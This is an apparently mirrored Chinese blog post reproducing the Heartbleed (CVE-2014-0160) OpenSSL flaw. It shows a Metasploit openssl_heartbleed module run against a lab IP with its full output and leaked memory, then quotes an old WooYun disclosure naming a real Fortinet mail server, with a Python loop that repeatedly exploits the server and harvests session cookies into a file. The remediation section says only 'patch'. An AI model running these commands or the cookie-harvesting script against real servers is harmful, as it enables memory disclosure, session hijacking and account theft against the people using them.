zoukankan html css js c++ java

HEARTBLEED 漏洞复现

漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
rhosts => 172.16.20.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...
[*] 172.16.20.134:443     - SSL record #1:
[*] 172.16.20.134:443     -     Type:    22
[*] 172.16.20.134:443     -     Version: 0x0301
[*] 172.16.20.134:443     -     Length:  86
[*] 172.16.20.134:443     -     Handshake #1:
[*] 172.16.20.134:443     -             Length: 82
[*] 172.16.20.134:443     -             Type:   Server Hello (2)
[*] 172.16.20.134:443     -             Server Hello Version:           0x0301
[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
[*] 172.16.20.134:443     -             Server Hello Session ID length: 32
[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
[*] 172.16.20.134:443     - SSL record #2:
[*] 172.16.20.134:443     -     Type:    22
[*] 172.16.20.134:443     -     Version: 0x0301
[*] 172.16.20.134:443     -     Length:  909
[*] 172.16.20.134:443     -     Handshake #1:
[*] 172.16.20.134:443     -             Length: 905
[*] 172.16.20.134:443     -             Type:   Certificate Data (11)
[*] 172.16.20.134:443     -             Certificates length: 902
[*] 172.16.20.134:443     -             Data length: 905
[*] 172.16.20.134:443     -             Certificate #1:
[*] 172.16.20.134:443     -                     Certificate #1: Length: 899
[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
[*] 172.16.20.134:443     - SSL record #3:
[*] 172.16.20.134:443     -     Type:    22
[*] 172.16.20.134:443     -     Version: 0x0301
[*] 172.16.20.134:443     -     Length:  331
[*] 172.16.20.134:443     -     Handshake #1:
[*] 172.16.20.134:443     -             Length: 327
[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)
[*] 172.16.20.134:443     - SSL record #4:
[*] 172.16.20.134:443     -     Type:    22
[*] 172.16.20.134:443     -     Version: 0x0301
[*] 172.16.20.134:443     -     Length:  4
[*] 172.16.20.134:443     -     Handshake #1:
[*] 172.16.20.134:443     -             Length: 0
[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)
[*] 172.16.20.134:443     - Sending Heartbeat...
[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes
[+] 172.16.20.134:443     - Heartbeat response with leak
[*] 172.16.20.134:443     - Printable info leaked:
......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS.......J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS.......J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

乌云案例

详细说明：

code 区域

Fortinet邮箱服务器url：https://mail.fortinet.com.cn

存在漏洞的端口：443

该端口存在CVE-2014-0160即心脏滴血漏洞，每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息：

code 区域

可以看到账户cookie，可以通过如下脚本，不断的抓cookie：

code 区域

import os

import re

import time



accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '
')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个：

漏洞证明：

修复方案：

补丁

查看全文

相关阅读:
XMPP协议之消息回执解决方案
 使用js在网页上记录鼠标划圈的小程序
 数据库SQL,NoSQL之小感悟
 MongoDB安装与使用体验
 缓存遇到的数据过滤与分页问题
 Tomcat shutdown执行后无法退出进程问题排查及解决
 Apache Ignite之集群应用测试
 Ignite性能测试以及对redis的对比
 学习AOP之深入一点Spring Aop
学习AOP之认识一下Spring AOP

原文地址：https://www.cnblogs.com/junsec/p/11474465.html